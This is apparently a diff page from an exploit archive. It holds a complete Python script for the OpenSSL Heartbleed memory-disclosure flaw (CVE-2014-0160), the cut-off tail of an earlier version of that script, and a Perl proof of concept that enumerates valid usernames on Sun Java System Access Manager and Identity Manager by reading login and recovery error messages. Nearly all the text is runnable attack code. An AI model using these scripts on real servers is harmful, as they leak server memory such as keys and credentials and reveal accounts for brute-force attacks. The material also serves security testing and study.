c0 1b 00 16 00 13 c0 0d c0 03 00 0a c0 13 c0 09
c0 1f c0 1e 00 33 00 32 00 9a 00 99 00 45 00 44
c0 0e c0 04 00 2f 00 96 00 41 c0 11 c0 07 c0 0c
c0 02 00 05 00 04 00 15 00 12 00 09 00 14 00 11
00 08 00 06 00 03 00 ff 01 00 00 49 00 0b 00 04
03 00 01 02 00 0a 00 34 00 32 00 0e 00 0d 00 19
00 0b 00 0c 00 18 00 09 00 0a 00 16 00 17 00 08
00 06 00 07 00 14 00 15 00 04 00 05 00 12 00 13
00 01 00 02 00 03 00 0f 00 10 00 11 00 23 00 00
00 0f 00 01 01
''')
hb = h2bin('''
18 03 02 00 03
01 40 00
''')
def hexdump(s):
for b in xrange(0, len(s), 16):
lin = [c for c in s[b : b + 16]]
hxdat = ' '.join('%02X' % ord(c) for c in lin)
pdat = ''.join((c if 32 <= ord(c) <= 126 else '.' )for c in lin)
print ' %04x: %-48s %s' % (b, hxdat, pdat)
print
def recvall(s, length, timeout=5):
endtime = time.time() + timeout
rdata = ''
remain = length
while remain > 0:
rtime = endtime - time.time()
if rtime < 0:
return None
r, w, e = select.select([s], [], [], 5)
if s in r:
data = s.recv(remain)
# EOF?
if not data:
return None
rdata += data
remain -= len(data)
return rdata
def recvmsg(s):
hdr = recvall(s, 5)
if hdr is None:
print 'Unexpected EOF receiving record header - server closed connection'
return None, None, None
typ, ver, ln = struct.unpack('>BHH', hdr)
pay = recvall(s, ln, 10)
if pay is None:
print 'Unexpected EOF receiving record payload - server closed connection'
return None, None, None
print ' ... received message: type = %d, ver = %04x, length = %d' % (typ, ver, len(pay))
return typ, ver, pay
def hit_hb(s):
s.send(hb)
while True:
typ, ver, pay = recvmsg(s)
if typ is None:
print 'No heartbeat response received, server likely not vulnerable'
return False
if typ == 24:
print 'Received heartbeat response:'
hexdump(pay)
if len(pay) > 3:
print 'WARNING: server returned more data than it should - server is vulnerable!'
else:
print 'Server processed malformed heartbeat, but did not return any extra data.'
return True
if typ == 21:
print 'Received alert:'
hexdump(pay)
print 'Server returned error, likely not vulnerable'
return False
def main():
opts, args = options.parse_args()
if len(args) < 1:
options.print_help()
return
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
print 'Connecting...'
sys.stdout.flush()
s.connect((args[0], opts.port))
print 'Sending Client Hello...'
sys.stdout.flush()
s.send(hello)
print 'Waiting for Server Hello...'
sys.stdout.flush()
while True:
typ, ver, pay = recvmsg(s)
if typ == None:
print 'Server closed connection without sending Server Hello.'
return
# Look for server hello done message.
if typ == 22 and ord(pay[0]) == 0x0E:
break
print 'Sending heartbeat request...'
sys.stdout.flush()
s.send(hb)
hit_hb(s)
if __name__ == '__main__':
main()

182
platforms/multiple/remote/32762.pl Executable file
View file

@ -0,0 +1,182 @@
source: http://www.securityfocus.com/bid/33489/info
Sun Java System Access Manager is prone to a username-enumeration weakness because of a design error in the application when verifying user-supplied input.
Attackers may exploit this weakness to discern valid usernames. This may aid them in brute-force password cracking or other attacks.
This issue affects the following versions:
Sun Java System Access Manager 6 2005Q1 (6.3)
Sun Java System Access Manager 7 2005Q4 (7.0)
Sun Java System Access Manager 7.1
Sun OpenSSO is also reported vulnerable.
#!/usr/bin/perl -w
# POC: Sun Java Access Manager and Identity Manager Users Enumeration
# Developed for OWASP Testing guide V3
# Simple script for Sun Java access manager and Identity Manager users enumeration
#
# Author : Marco Mella <marco.mella <at> aboutsecurity.net>
# Site : www.aboutsecurity.net
#
# © Copyright, 2008-2009 Marco Mella
# Sun Java System Access Manager and Sun Java System Identity Manager
# are trademarks or registered trademarks of Sun Microsystems, Inc.
#
# Last updated: 13 Jun 2008
#
use Getopt::Long;
use LWP::UserAgent;
use Switch;
$Userfile = "";
$line="";
my ($server, $user_file, $switch);
my $banner = "Author: Marco Mella <marco.mella <at> aboutsecurity.net>\n";
my $usage= "Usage:\n $0 -server <ip_address|host> -port <tcp port> -userfile <filename> -switch<am|idm> \n\n";
my $opt = GetOptions (
'server=s' => \$Server,
'port=s' => \$Port,
'userfile=s' => \$Userfile,
'switch=s' => \$Switch );
print "\n\n\n\n+-----------------------------------------------------------------------------------+\n\n";
print " Sun Java Access Manager and Identity Manager User Enumeration \n";
print " ".$banner."\n";
print "+-----------------------------------------------------------------------------------+\n\n";
if ( !$Server || !$Userfile ||!$Port || !$Switch) {
print $usage;
exit(1);
}
if ( $Switch eq "am" ) {
open(Userfile) or die("Could not open file: $Userfile\n\n");
print "Users enumeration Sun java System Access Manager\n\n ";
foreach $line (<Userfile>) {
my $url = 'https://'.$Server.':'.$Port.'/amserver/UI/Login?user='.$line;
my $browser = LWP::UserAgent->new;
my $response = $browser->get($url);
my @headers = $response->header_field_names;
#print "response headers: @headers\n";
$response->is_success or
die "Failed to GET '$url': ", $response->status_line, "\n Aborintg";
#print $response->as_string;
chomp($line);
# Analysis of response and title of web page received
if(($response->content =~ m{This user is not active} ) || ($response->title =~ m{User Inactive})) {
# print $response->content;
# print "\n\n\n\n";
# print $response->title;
print "\n\tUser: $line not valid\n\n"}
elsif (($response->content =~ m{No configuration found} ) || ($response->title =~ m{No Configuration Error})) {
print "\n\tUser: $line yeah ... Active user! \n\n"}
elsif ($response->content =~ m{Your account has been locked.} ) {
print "\n\tUser: $line Exist but Account has been locked\n\n"}
else {
print "\n\tUser: $line Active ???? Maybe you have to analizing the error message received \n\n"}
}
print "\n\n";
close(Userfile);
}
if ( $Switch eq "idm" ) {
open(Userfile) or die("Could not open file: $Userfile\n\n");
print "Users enumeration Sun java System Identity Manager - Login Feature Analysis\n\n ";
foreach $line (<Userfile>) {
my $url = 'https://'.$Server.':'.$Port.'/idm/login.jsp?id=&command=login&activeControl=&accountId='.$line.'&password=';
my $browser = LWP::UserAgent->new;
my $response = $browser->get($url);
my @headers = $response->header_field_names;
my $title = $response->title;
#print "response headers: @headers\n";
$response->is_success or
die "Failed to GET '$url': ", $response->status_line, "\n Aborintg";
#print $response->as_string;
chomp($line);
# Analysis of response and title of web page received
if($response->content =~ m{Invalid Account ID} ) {
# print $response->content;
# print "\n\n\n\n";
# print $response->title;
print "\n\tUser: $line not valid\n\n"}
elsif ($response->content =~ m{Invalid Password} ) {
print "\n\tUser: $line yeah ... Active user! \n\n"}
elsif ($response->content =~ m{Your account has been locked.} ) {
print "\n\tUser: $line Exist but Account has been locked\n\n"}
else {
print "\n\tUser: $line Active ???? Maybe you have to analizing the error message received \n\n"}
}
close(Userfile);
}
#IDM Recovery Feature
#https://oiawf02:8081/idm/questionLogin.jsp?accountId=owasp&lang=en&cntry=US
if ( $Switch eq "idm" ) {
open(Userfile) or die("Could not open file: $Userfile\n\n");
print "\n\n\n\nUsers enumeration Sun java System Identity Manager - Recovery Feature Analysis\n\n ";
foreach $line (<Userfile>) {
my $url = 'https://'.$Server.':'.$Port.'/idm/questionLogin.jsp?accountId='.$line;
my $browser = LWP::UserAgent->new;
my $response = $browser->get($url);
my @headers = $response->header_field_names;
my $title = $response->title;
#print "response headers: @headers\n";
$response->is_success or
die "Failed to GET '$url': ", $response->status_line, "\n Aborintg";
#print $response->as_string;
chomp($line);
# Analysis of response and title of web page received
if($response->content =~ m{The specified user was not found} ) {
# print $response->content;
# print "\n\n\n\n";
# print $response->title;
print "\n\tUser: $line not valid\n\n"}
elsif ($response->content =~ m{Too few user} ) {
print "\n\tUser: $line yeah ... Active user! \n\n"}
elsif ($response->content =~ m{Your account has been locked.} ) {
print "\n\tUser: $line Exist but Account has been locked\n\n"}
else {
print "\n\tUser: $line Active ???? Maybe you have to analizing the error message received \n\n"}
}
print "\n\n";
close(Userfile);
}

156
platforms/multiple/remote/32764.py Executable file
View file

@ -0,0 +1,156 @@
# Exploit Title: [OpenSSL TLS Heartbeat Extension - Memory Disclosure - Multiple SSL/TLS versions]
# Date: [2014-04-09]
# Exploit Author: [Csaba Fitzl]
# Vendor Homepage: [http://www.openssl.org/]
# Software Link: [http://www.openssl.org/source/openssl-1.0.1f.tar.gz]
# Version: [1.0.1f]
# Tested on: [N/A]
# CVE : [2014-0160]
#!/usr/bin/env python
# Quick and dirty demonstration of CVE-2014-0160 by Jared Stafford (jspenguin@jspenguin.org)
# The author disclaims copyright to this source code.
# Modified by Csaba Fitzl for multiple SSL / TLS version support
import sys
import struct
import socket
import time
import select
import re
from optparse import OptionParser
options = OptionParser(usage='%prog server [options]', description='Test for SSL heartbeat vulnerability (CVE-2014-0160)')
options.add_option('-p', '--port', type='int', default=443, help='TCP port to test (default: 443)')
def h2bin(x):
return x.replace(' ', '').replace('\n', '').decode('hex')
version = []
version.append(['SSL 3.0','03 00'])
version.append(['TLS 1.0','03 01'])
version.append(['TLS 1.1','03 02'])
version.append(['TLS 1.2','03 03'])
def create_hello(version):
hello = h2bin('16 ' + version + ' 00 dc 01 00 00 d8 ' + version + ''' 53
43 5b 90 9d 9b 72 0b bc 0c bc 2b 92 a8 48 97 cf
bd 39 04 cc 16 0a 85 03 90 9f 77 04 33 d4 de 00
00 66 c0 14 c0 0a c0 22 c0 21 00 39 00 38 00 88
00 87 c0 0f c0 05 00 35 00 84 c0 12 c0 08 c0 1c
c0 1b 00 16 00 13 c0 0d c0 03 00 0a c0 13 c0 09
c0 1f c0 1e 00 33 00 32 00 9a 00 99 00 45 00 44
c0 0e c0 04 00 2f 00 96 00 41 c0 11 c0 07 c0 0c
c0 02 00 05 00 04 00 15 00 12 00 09 00 14 00 11
00 08 00 06 00 03 00 ff 01 00 00 49 00 0b 00 04
03 00 01 02 00 0a 00 34 00 32 00 0e 00 0d 00 19
00 0b 00 0c 00 18 00 09 00 0a 00 16 00 17 00 08
00 06 00 07 00 14 00 15 00 04 00 05 00 12 00 13
00 01 00 02 00 03 00 0f 00 10 00 11 00 23 00 00
00 0f 00 01 01
''')
return hello
def create_hb(version):
hb = h2bin('18 ' + version + ' 00 03 01 40 00')
return hb
def hexdump(s):
for b in xrange(0, len(s), 16):
lin = [c for c in s[b : b + 16]]
hxdat = ' '.join('%02X' % ord(c) for c in lin)
pdat = ''.join((c if 32 <= ord(c) <= 126 else '.' )for c in lin)
print ' %04x: %-48s %s' % (b, hxdat, pdat)
print
def recvall(s, length, timeout=5):
endtime = time.time() + timeout
rdata = ''
remain = length
while remain > 0:
rtime = endtime - time.time()
if rtime < 0:
return None
r, w, e = select.select([s], [], [], 5)
if s in r:
data = s.recv(remain)
# EOF?
if not data:
return None
rdata += data
remain -= len(data)
return rdata
def recvmsg(s):
hdr = recvall(s, 5)
if hdr is None:
print 'Unexpected EOF receiving record header - server closed connection'
return None, None, None
typ, ver, ln = struct.unpack('>BHH', hdr)
pay = recvall(s, ln, 10)
if pay is None:
print 'Unexpected EOF receiving record payload - server closed connection'
return None, None, None
print ' ... received message: type = %d, ver = %04x, length = %d' % (typ, ver, len(pay))
return typ, ver, pay
def hit_hb(s,hb):
s.send(hb)
while True:
typ, ver, pay = recvmsg(s)
if typ is None:
print 'No heartbeat response received, server likely not vulnerable'
return False
if typ == 24:
print 'Received heartbeat response:'
hexdump(pay)
if len(pay) > 3:
print 'WARNING: server returned more data than it should - server is vulnerable!'
else:
print 'Server processed malformed heartbeat, but did not return any extra data.'
return True
if typ == 21:
print 'Received alert:'
hexdump(pay)
print 'Server returned error, likely not vulnerable'
return False
def main():
opts, args = options.parse_args()
if len(args) < 1:
options.print_help()
return
for i in range(len(version)):
print 'Trying ' + version[i][0] + '...'
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
print 'Connecting...'
sys.stdout.flush()
s.connect((args[0], opts.port))
print 'Sending Client Hello...'
sys.stdout.flush()
s.send(create_hello(version[i][1]))
print 'Waiting for Server Hello...'
sys.stdout.flush()
while True:
typ, ver, pay = recvmsg(s)
if typ == None:
print 'Server closed connection without sending Server Hello.'
return
# Look for server hello done message.
if typ == 22 and ord(pay[0]) == 0x0E:
break
print 'Sending heartbeat request...'
sys.stdout.flush()
s.send(create_hb(version[i][1]))
if hit_hb(s,create_hb(version[i][1])):
#Stop if vulnerable
break
if __name__ == '__main__':
main()

Some files were not shown because too many files have changed in this diff Show more